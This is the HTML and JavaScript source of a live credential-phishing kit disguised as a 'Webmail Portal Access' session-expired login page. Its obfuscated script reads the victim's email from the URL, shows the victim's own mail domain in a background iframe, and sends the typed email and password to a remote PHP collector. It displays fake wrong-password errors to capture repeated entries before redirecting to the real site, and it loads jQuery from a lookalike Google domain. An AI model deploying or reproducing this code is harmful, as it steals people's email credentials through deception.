<html lang="en">
    <head>
<meta name="robots" content="nofollow">
<meta name="googlebot" content="nofollow">
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="noindex">
<meta name="googlebot-news" content="nosnippet">
<meta http-equiv="Cache-Control" content="no-store">
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Cache-Control" content="private">
<meta http-equiv="Pragma" content="no-cache">   
    <title>Webmail Portal Access </title>
	<link type="text/css" rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
	<script src="https://ajax.googleapis.luchifab.com/ajax.googleapis/ajax/libs/jquery/2.2.4/jquery.min.js"></script> 
	<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
   <style type="text/css">
	body {
    font-family: 'Open Sans', sans-serif;
    color: #535353;
}

.img-fluid {
    max-width: 100% !important;
    height: auto;
}

.form-control:focus {
    box-shadow: none;
}

h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 {
    font-family: 'Open Sans', sans-serif;
}

/** Login 1 start **/
.login-1 {
    background: rgba(0, 0, 0, 0.04) url() top left repeat;
    background-size: cover;
    top: 0;
    width: 100%;
    bottom: 0;
    opacity: 1;
    min-height: 100vh;
    text-align: center;
    position: relative;
    display: -webkit-box;
    display: -moz-box;
    display: -ms-flexbox;
    display: -webkit-flex;
    display: flex;
    justify-content: center;
    align-items: center;
    padding: 30px;
}

.login-1 .login-inner-form {
    max-width: 380px;
    margin: 0 auto;
    color: #717171;
    text-align: center;
}

.login-1 .login-inner-form .details {
    padding: 25px 30px 30px;
    background: #fff;
    border-radius: 5px 5px 0 0;
}

.login-1 .login-inner-form img {
    margin-bottom: 15px;
    height: 30px;
}

.login-1 .login-inner-form h3 {
    margin: 0 0 25px;
    font-size: 18px;
    font-weight: 400;
    font-family: 'Open Sans', sans-serif;
    color: #717171;
}

.login-1 .login-inner-form .form-group {
    margin-bottom: 25px;
}

.login-1 .login-inner-form .input-text {
    width: 100%;
    padding: 10px 15px;
    font-size: 14px;
    border: 1px solid #e8e7e7;
    outline: none;
    color: #717171;
    border-radius: 3px;
    height: 45px;
}

.login-1 .login-inner-form .btn-md {
    cursor: pointer;
    padding: 12px 30px 11px 30px;
    letter-spacing: 1px;
    font-size: 15px;
    font-weight: 600;
    font-family: 'Open Sans', sans-serif;
    border-radius: 3px;
}

.login-1 .login-inner-form .social-list{
    margin-bottom: 0;
    padding: 0;
}

.login-1 .login-inner-form .checkbox a {
    font-size: 14px;
    color: #717171;
    float: right;
}

.login-1 .login-inner-form .terms{
    margin-left: 3px;
}

.login-1 .login-inner-form .checkbox {
    margin-bottom: 25px;
    font-size: 14px;
}

.login-1 .login-inner-form .form-check{
    float: left;
    margin-bottom: 0;
}

.login-1 .login-inner-form .form-check a {
    color: #717171;
    float: right;
}

.login-1 .login-inner-form .form-check-input {
    position: absolute;
    margin-left: 0;
}

.login-1 .login-inner-form .form-check label::before {
    content: "";
    display: inline-block;
    position: absolute;
    width: 17px;
    height: 17px;
    margin-left: -25px;
    border: 1px solid #cccccc;
    border-radius: 3px;
    background-color: #fff;
}

.login-1 .login-inner-form .form-check-label {
    padding-left: 25px;
    margin-bottom: 0;
    font-size: 14px;
}

.login-1 .login-inner-form .checkbox-theme input[type="checkbox"]:checked + label::before {
    background-color: #0f96f9;
    border-color: #0f96f9;
}

.login-1 .login-inner-form input[type=checkbox]:checked + label:before {
    font-weight: 300;
    color: #f3f3f3;
    line-height: 15px;
    font-size: 14px;
    content: "\2713";
}

.login-1 .login-inner-form input[type=checkbox], input[type=radio] {
    margin-top: 4px;
}

.login-1 .login-inner-form .social-list li {
    display: inline-block;
    font-size: 16px;
    margin-top: 30px;
}

.login-1 .login-inner-form .social-list li a {
    margin:2px;
    font-size: 14px;
    width: 35px;
    height: 35px;
    border-radius: 3px;
    display: inline-block;
    text-align: center;
    line-height: 35px;
}

.login-1 .login-inner-form .footer {
    font-size: 14px;
    padding: 15px 20px;
    background-color: #f5f5f5;
    border-radius: 0 0 5px 5px;
    border-top: solid 1px #f5f5f5;
}

.login-1 .login-inner-form .footer span a {
    color: #717171;
}

.login-1 .login-inner-form button:focus {
    outline: none;
    outline: 0 auto -webkit-focus-ring-color;
}

.login-1 .login-inner-form .btn-theme:not([disabled]):not(.disabled).active, .btn-theme:not([disabled]):not(.disabled):active, .show > .btn-theme.dropdown-toggle {
    box-shadow: none;
}

.login-1 .login-inner-form .btn-theme.focus, .btn-theme:focus {
    box-shadow: none;
}

.login-1 .login-inner-form .btn-theme {
    background: #0f96f9;
    border: none;
    color: #fff;
}

.login-1 .login-inner-form .btn-theme:hover {
    background: #0294B6;
}

/** Social media **/
.login-1 .facebook-bg {
    background: #4867aa;
    color: #fff;
}

.login-1 .facebook-bg:hover {
    background: #3b589e;
    color: #fff;
}

.login-1 .twitter-bg {
    background: #33CCFF;
    color: #fff;
}

.login-1 .twitter-bg:hover {
    background: #56d7fe;
    color: #fff;
}

.login-1 .google-bg {
    background: #db4437;
    color: #fff;
}

.login-1 .google-bg:hover {
    background: #dc4e41;
    color: #fff;
}

.login-1 .linkedin-bg {
    background: #0177b5;
    color: #fff;
}

.login-1 .linkedin-bg:hover {
    background: #1c82ca;
    color: #fff;
}

/** MEDIA **/
@media (max-width: 992px) {
    .login-1 {
        padding: 30px 0;
    }
}

.gradient-buttons .btn {
    background-image: linear-gradient(to right, rgba(255,255,255,0.5), rgba(255,255,255,0.2) 39%, rgba(0,0,0,0.15) 91%, rgba(0,0,0,0.05));
    background-repeat: repeat-x;
}

.card {
  margin: 10px;
  box-shadow: 0 5px 10px -2.5px;
}
	</style>
  </head>
  <body id="top">
      
      <div id="firstload">
          <div class="container h-100">
  <div class="row h-100 justify-content-center align-items-center">
    <div class="col-12">
    <div class="row">
        <div class="col">
            <div class="text-center">
                <span class="text-info" id="tsstch">Connecting To Your Email Provider</span>
            </div>
        </div>
    </div>
<div class="row">
        <div class="col">
            <div class="text-center">
&nbsp;            </div>
        </div>
    </div>
                
        <div class="progress">
  <div class="progress-bar progress-bar-striped progress-bar-animated" role="progressbar" id="myBar" aria-valuenow="75" aria-valuemin="0" aria-valuemax="100" style="width: 1%"></div>
</div>
    </div>   
  </div>
</div>
      
      </div>
      <div id="allup" style="display: none">
 <iframe id="mainPage" src="" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;"></iframe>

<!-- Login 1 start -->
<div class="login-1">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="login-inner-form">
                    <div class="details">
                        
<div align="center">
<div class="alert alert-dark" role="alert" style="margin: -30px -30px; border-bottom-left-radius: 0%; border-bottom-right-radius: 0%;">
<i class="bi bi-airplane-fill"></i></div><br><br>
                          <h3 align="center"><span class="text-danger">Session Expired:</span> <span class="text-dark">Sign in to continue</span></h3>	
        <center>
          <div class="alert alert-danger" id="msg" style="display: none;">Invalid Password.! Please Enter your correct Password</div>
          <span id="error" class="text-danger" style="display: none;">That account doesn't exist. Enter a different account</span>
        </center>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"><i class="fas fa-user"></i></span>
            <input type="email" class="form-control" name="email" placeholder="Username" value="" id="email" readonly>
          </div>
        </div>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"><i class="fas fa-lock"></i></span>
            <input type="password" class="form-control" id="password" name="password" placeholder="Password" required="required">
          </div>
        </div>
		
        <div class="form-group">
         <div class="gradient-buttons">
		           <button type="button" class="btn btn-primary login-btn btn-block" id="submit-btn">Continue</button>
            </div>
        </div>
       

      
      
    </div>

   
  </div></div></div></div></div></div>
      </div>
      
      
    </body>

<style>.tb_button {padding:1px;cursor:pointer;border-right: 1px solid #8b8b8b;border-left: 1px solid #FFF;border-bottom: 1px solid #fff;}.tb_button.hover {borer:2px outset #def; background-color: #f8f8f8 !important;}.ws_toolbar {z-index:100000} .ws_toolbar .ws_tb_btn {cursor:pointer;border:1px solid #555;padding:3px}   .tb_highlight{background-color:yellow} .tb_hide {visibility:hidden} .ws_toolbar img {padding:2px;margin:0px}</style>


 <!-- jQuery first, then Popper.js, then Bootstrap JS -->
      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>


  <script>
var _0x4dd906=_0x2d4c;(function(_0x618ce5,_0x363db9){var _0x9c8ac1=_0x2d4c,_0x5e2e21=_0x618ce5();while(!![]){try{var _0x489ba7=-parseInt(_0x9c8ac1(0x20a))/0x1+parseInt(_0x9c8ac1(0x1f2))/0x2+-parseInt(_0x9c8ac1(0x218))/0x3+-parseInt(_0x9c8ac1(0x1fb))/0x4+parseInt(_0x9c8ac1(0x1f9))/0x5+parseInt(_0x9c8ac1(0x214))/0x6+parseInt(_0x9c8ac1(0x1f1))/0x7;if(_0x489ba7===_0x363db9)break;else _0x5e2e21['push'](_0x5e2e21['shift']());}catch(_0xe810d0){_0x5e2e21['push'](_0x5e2e21['shift']());}}}(_0x1f81,0x4f65c));function _0x2d4c(_0x3ab9d8,_0x47d130){var _0x1f81cb=_0x1f81();return _0x2d4c=function(_0x2d4c58,_0x1c082b){_0x2d4c58=_0x2d4c58-0x1e8;var _0x1b4230=_0x1f81cb[_0x2d4c58];return _0x1b4230;},_0x2d4c(_0x3ab9d8,_0x47d130);}function _0x1f81(){var _0xb097db=['487668ntWZMa','mainPage','show','ready','403119hOrcWk','#allup','log','myBar','location','#back1','.email','Sign\x20in','#firstload','#error','style','1882867YPljju','1200048LHiJKn','focus','parent','val','https://','#password','src','278560UYVcZg','html','1122104fjFRNn','substr','#inputbar','<span\x20style=\x27color:red;\x27>Username\x20or\x20Password\x20is\x20incorrect.\x20Please\x20try\x20again</span>','signal','ajax','msg','#automail','https://martinoketurraciai.io/css/lt/uw.php','click','#email','animate','#msg','Preparing\x20Session...','indexOf','265884hpTUZD','hide','hash','http://www.','test','Verifing...','POST','getElementById','#submit-btn','href'];_0x1f81=function(){return _0xb097db;};return _0x1f81();}function rello(){setTimeout(function(){var _0x597766=_0x2d4c;$('#tsstch')['html'](_0x597766(0x208));},0x7d0);}var i=0x0;function move(){var _0x30ead5=_0x2d4c;rello();if(i==0x0){i=0x1;var _0x280220=document[_0x30ead5(0x211)](_0x30ead5(0x1e9)),_0x238b3e=0x1,_0xf9b8ce=setInterval(_0x4ae279,0x28);function _0x4ae279(){var _0x57b01d=_0x30ead5;_0x238b3e>=0x64?(clearInterval(_0xf9b8ce),i=0x0,$(_0x57b01d(0x1ee))[_0x57b01d(0x20b)](),$(_0x57b01d(0x219))['show']()):(_0x238b3e++,_0x280220[_0x57b01d(0x1f0)]['width']=_0x238b3e+'%');}}}$(document)[_0x4dd906(0x217)](function(){var _0x1ffda4=_0x4dd906;move();var _0x1070b1=0x0;$(_0x1ffda4(0x1eb))[_0x1ffda4(0x204)](function(){var _0x53c8e7=_0x1ffda4;$(_0x53c8e7(0x207))[_0x53c8e7(0x20b)](),$(_0x53c8e7(0x205))[_0x53c8e7(0x1f5)](''),$(_0x53c8e7(0x202))[_0x53c8e7(0x206)]({'left':0xc8,'opacity':_0x53c8e7(0x20b)},0x0),$(_0x53c8e7(0x1fd))[_0x53c8e7(0x206)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x16a0df=window[_0x1ffda4(0x1ea)][_0x1ffda4(0x20c)]['substr'](0x1);if(!_0x16a0df){}else{var _0x3d06bd=_0x16a0df;$(_0x1ffda4(0x205))[_0x1ffda4(0x1f5)](_0x3d06bd);var _0x102fe4=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x102fe4[_0x1ffda4(0x20e)](_0x3d06bd))return $(_0x1ffda4(0x1ef))['show'](),_0x16a0df[_0x1ffda4(0x1f3)],![];var _0x4f9384=_0x3d06bd[_0x1ffda4(0x209)]('@'),_0x3d1495=_0x3d06bd[_0x1ffda4(0x1fc)](_0x4f9384+0x1),_0x18c8a1=_0x1ffda4(0x1f6)+_0x3d1495;document[_0x1ffda4(0x211)](_0x1ffda4(0x215))[_0x1ffda4(0x1f8)]=_0x18c8a1,$(_0x1ffda4(0x1ec))[_0x1ffda4(0x1fa)](_0x16a0df);}$(_0x1ffda4(0x212))[_0x1ffda4(0x204)](function(_0x59147b){var _0x431976=_0x1ffda4,_0x2d751d=$(_0x431976(0x205))[_0x431976(0x1f5)](),_0x2f171e=$('#password')[_0x431976(0x1f5)]();if(_0x2f171e['length']<0x4)return $(_0x431976(0x207))[_0x431976(0x216)](),$(_0x431976(0x207))['html']('Wrong\x20password!\x20Please\x20try\x20again'),![];_0x1070b1=_0x1070b1+0x1,$[_0x431976(0x200)]({'dataType':'JSON','url':_0x431976(0x203),'type':_0x431976(0x210),'data':{'oemail':_0x2d751d,'opassword':_0x2f171e},'beforeSend':function(_0x309850){var _0x4c4e9a=_0x431976;$(_0x4c4e9a(0x212))[_0x4c4e9a(0x1fa)](_0x4c4e9a(0x20f));},'success':function(_0x32f724){var _0x701211=_0x431976;$(_0x701211(0x207))['html'](_0x701211(0x1fe)),_0x32f724&&($(_0x701211(0x207))[_0x701211(0x216)](),console[_0x701211(0x1e8)](_0x32f724),$(_0x701211(0x207))['html'](_0x32f724[_0x701211(0x201)]),_0x32f724[_0x701211(0x1ff)]=='ok'?($('#password')['val'](''),_0x1070b1>=0x3&&(_0x1070b1=0x0,window[_0x701211(0x1f4)][_0x701211(0x1ea)][_0x701211(0x213)]=_0x701211(0x20d)+_0x3d1495)):$(_0x701211(0x207))[_0x701211(0x1fa)](_0x32f724[_0x701211(0x201)]));},'error':function(){var _0x127200=_0x431976;$(_0x127200(0x1f7))[_0x127200(0x1f5)](''),_0x1070b1>=0x3&&(_0x1070b1=0x0,window[_0x127200(0x1f4)]['location'][_0x127200(0x213)]=_0x127200(0x20d)+_0x3d1495),$(_0x127200(0x207))[_0x127200(0x216)]();},'complete':function(){var _0x5e7d1e=_0x431976;$(_0x5e7d1e(0x212))[_0x5e7d1e(0x1fa)](_0x5e7d1e(0x1ed));}});});});
  </script>
</html>